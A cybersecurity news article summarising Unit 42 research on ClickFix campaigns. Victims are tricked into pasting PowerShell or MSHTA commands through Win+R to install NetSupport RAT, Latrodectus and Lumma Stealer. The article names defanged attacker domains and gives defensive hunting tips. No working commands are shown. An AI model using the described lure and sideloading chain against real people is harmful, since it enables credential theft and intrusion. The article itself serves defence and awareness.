The Emerging Technique Threat Actors Use to Dominate Targeted Organizations

Threat actors have increasingly adopted ClickFix, a sophisticated social engineering technique that deceives users into executing malicious commands under the guise of resolving common computer issues like performance lags or pop-up errors.

This method, often delivered via compromised websites, malvertising, YouTube tutorials, or fake tech support forums, relies on clipboard hijacking also known as pastejacking to inject harmful scripts into a victim’s clipboard.

Victims are then instructed to paste and run these commands via Windows shortcuts like Win+R for the Run dialog or Win+X for a terminal, effectively bypassing traditional security controls without exploits, attachments, or direct downloads.

Unit 42 researchers have tracked a surge in ClickFix campaigns, impacting diverse industries including high technology, financial services, manufacturing, and government sectors.

With nearly a dozen incident response cases linked to ClickFix as the initial access vector, this technique has enabled full organizational takeovers, leading to credential theft, data exfiltration, and ransomware deployments.

The payloads vary, from infostealers to remote access trojans (RATs), but all exploit human trust in legitimate-seeming fixes, making detection challenging yet feasible through artifacts like registry keys or event logs.

Prominent Campaigns

Among the most notable 2025 campaigns, attackers distributing NetSupport RAT have leveraged fake DocuSign and Okta pages on domains like docusign.sa[.]com and oktacheck.it[.]com, likely tied to ClearFake infrastructure.

These lures inject PowerShell commands that download ZIP archives containing legitimate Java components sideloaded with malicious DLLs, ultimately deploying the RAT for endpoint infiltration.

Similarly, Latrodectus malware campaigns, active in March-April, redirect users from compromised sites to verification pages that pastejack PowerShell scripts, downloading JavaScript droppers obfuscated with junk JSON variables.

These execute MSI files dropping Latrodectus as libcef.dll, sideloaded via legitimate binaries, often leading to Lumma Stealer as a follow-on payload.

Lumma Stealer operations, surging in April, use typosquatted domains like iplogger[.]co to deliver MSHTA commands fetching encoded PowerShell scripts, which extract AutoIt-based loaders from CAB files like Boat.pst, harvesting browser credentials for exfiltration to C2 servers such as sumeriavgv[.]digital.

These campaigns demonstrate ClickFix’s adaptability, incorporating new loaders and obfuscation to target sectors like automotive, energy, and IT.

Organizational Defenses

Hunting for ClickFix infections involves scrutinizing Windows artifacts, such as the RunMRU registry key for obfuscated commands or keywords indicating payload downloads, and event logs like Security ID 4688 for suspicious process creations from explorer.exe.

For Win+X variants, correlate elevated PowerShell sessions with object access events or clipboard paste activities.

According to the Report, Palo Alto Networks’ Advanced WildFire, URL Filtering, DNS Security, Cortex XDR, and XSIAM provide robust protection by detecting clipboard injections and behavioral anomalies.

Organizations should prioritize employee awareness training on suspicious lures while implementing endpoint detection and response (EDR) telemetry monitoring.

As ClickFix evolves, proactive measures are essential to counter this global threat, with Unit 42 sharing intelligence via the Cyber Threat Alliance for broader defenses.

Indicators of Compromise (IOCs)

Stay Updated on Daily Cybersecurity News. Follow us on Google News, LinkedIn, and X.